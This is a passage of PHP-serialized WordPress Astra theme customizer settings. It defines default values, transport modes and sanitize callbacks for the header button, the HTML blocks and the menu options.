";s:17:"sanitize_callback";b:0;}s:36:"section-hb-button-1-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[header-button1-text]";a:4:{s:7:"default";s:6:"Button";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-button1-link-option]";a:4:{s:7:"default";a:3:{s:3:"url";s:23:"https://www.wpastra.com";s:7:"new_tab";b:0;s:8:"link_rel";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:13:"sanitize_link";}}s:47:"astra-settings[header-button1-text-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[header-button1-background-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-button1-text-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[header-button1-text-h-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-button1-back-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[header-button1-back-h-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:65:"astra-settings[header-button1-builder-button-border-colors-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[header-button1-border-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-button1-border-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-button1-border-size]";a:4:{s:7:"default";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[header-button1-border-radius-fields]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:46:"astra-settings[header-button1-text-typography]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-button1-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:42:"astra-settings[header-button1-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:40:"astra-settings[header-button1-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-button1-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[section-hb-button-1-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[section-hb-button-1-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[section-hb-button-1-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:2:"12";s:5:"right";s:2:"20";s:6:"bottom";s:2:"12";s:4:"left";s:2:"20";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:42:"astra-settings[section-hb-button-1-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:55:"astra-settings[section-hb-html-1-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[font-size-section-hb-html-1]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:15;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"section-hb-html-1-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:29:"astra-settings[header-html-1]";a:4:{s:7:"default";s:22:"Insert HTML text here.";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[header-html-1color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-html-1-link-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[header-html-1link-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-html-1link-h-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[section-hb-html-1-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[section-hb-html-1-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:55:"astra-settings[section-hb-html-2-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[font-size-section-hb-html-2]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:15;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"section-hb-html-2-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:29:"astra-settings[header-html-2]";a:4:{s:7:"default";s:22:"Insert HTML text here.";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[header-html-2color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-html-2-link-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[header-html-2link-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-html-2link-h-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[section-hb-html-2-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[section-hb-html-2-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:55:"astra-settings[section-hb-menu-1-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:34:"section-hb-menu-1-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-menu1-create-menu-link]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[header-menu1-menu-hover-animation]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[header-menu1-submenu-heading]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-menu1-submenu-width]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[header-menu1-submenu-container-animation]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[header-menu1-submenu-container-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[header-menu1-submenu-item-b-size]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[header-menu1-submenu-item-b-color]";a:4:{s:7:"default";s:7:"#eaeaea";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:47:"astra-settings[header-menu1-submenu-top-offset]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[header-menu1-submenu-border]";a:4:{s:7:"default";a:4:{s:3:"top";i:2;s:6:"bottom";i:0;s:4:"left";i:0;s:5:"right";i:0;}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[header-menu1-submenu-b-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:57:"astra-settings[header-menu1-submenu-border-radius-fields]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:48:"astra-settings[header-menu1-submenu-item-border]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[header-menu1-menu-stack-on-mobile]";a:4:{s:7:"default";b:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[section-hb-menu-1-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:40:"astra-settings[header-menu1-text-colors]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[header-menu1-background-colors]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-menu1-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:25:"var(--ast-global-color-3)";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[header-menu1-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[header-menu1-h-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:25:"var(--ast-global-color-1)";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[header-menu1-h-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[header-menu1-a-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:25:"var(--ast-global-color-1)";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[header-menu1-a-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[header-1-font-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[header-menu1-header-menu-typography]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-menu1-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:40:"astra-settings[header-menu1-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:38:"astra-settings[header-menu1-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-menu1-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-1-spacing-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-menu1-menu-spacing]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:55:"astra-settings[section-hb-menu-2-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:34:"section-hb-menu-2-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-menu2-create-menu-link]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[header-menu2-menu-hover-animation]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[header-menu2-submenu-heading]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-menu2-submenu-width]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[header-menu2-submenu-container-animation]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[header-menu2-submenu-container-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[header-menu2-submenu-item-b-size]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[header-menu2-submenu-item-b-color]";a:4:{s:7:"default";s:7:"#eaeaea";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:47:"astra-settings[header-menu2-submenu-top-offset]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[header-menu2-submenu-border]";a:4:{s:7:"default";a:4:{s:3:"top";i:2;s:6:"bottom";i:0;s:4:"left";i:0;s:5:"right";i:0;}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[header-menu2-submenu-b-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:57:"astra-settings[header-menu2-submenu-border-radius-fields]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:48:"astra-settings[header-menu2-submenu-item-border]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[header-menu2-menu-stack-on-mobile]";a:4:{s:7:"default";b:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[section-hb-menu-2-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:40:"astra-settings[header-menu2-text-colors]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[header-menu2-background-colors]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-menu2-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:25:"var(--ast-global-color-3)";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[header-menu2-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center 